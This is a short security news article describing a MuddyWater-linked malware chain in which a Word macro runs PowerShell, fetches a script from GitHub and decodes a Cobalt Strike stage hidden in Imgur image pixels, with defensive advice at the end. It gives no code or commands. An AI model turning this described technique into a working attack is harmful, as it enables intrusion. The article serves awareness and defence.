A new malware strain has been discovered that uses Word files with macros to download a PowerShell script hosted on GitHub. Further, the script downloads a legitimate image file from the image-sharing community, Imgur, which is used for decoding a Cobalt Strike script on Windows systems.
What has happened?
The malware strain is linked to a state-backed (APT) group known as MuddyWater. The malware spreads with an embedded macro within a legacy Microsoft Word (*.doc) file.
- Once the Word document is opened, it executes the embedded macro. Subsequently, the macro launches powershell[.]exe and adds the location of a PowerShell script that is hosted on GitHub.
- The single-line PowerShell script downloads a real PNG file from Imgur. In this image, downloaded image pixel values are used by the PowerShell script for calculating the next stage payload.
- Hiding payloads within an ordinary image is possible using the Invoke-PSImage. This tool can encode PowerShell script within the pixels of a PNG file, along with a one-line command for payload execution.
- The malicious payload communicates with the C) server using the WinINet module to obtain further instructions. However, the C2 server is not accessible anymore.
Abusing legitimate services
Abusing legitimate services, such as GitHub, has become a common attack method.
- Recently, Gitpaste-12 worm was spotted abusing GitHub and Pastebin to host its malicious payload and evade detection, while targeting web applications, IP cameras, and routers.
- TroubleGrabber malware was also observed using Discord and GitHub for downloading next stage payloads to victims’ machines.
Using legitimate services, such as GitHub and Imgur allows cybercriminals to mask their footsteps without any major investments. Thus, experts suggest organizations to be cautious against such attacks by providing training to their employees to identify phishing emails, disable macros if not needed, using reliable antivirus software, and frequently updating all software and patches.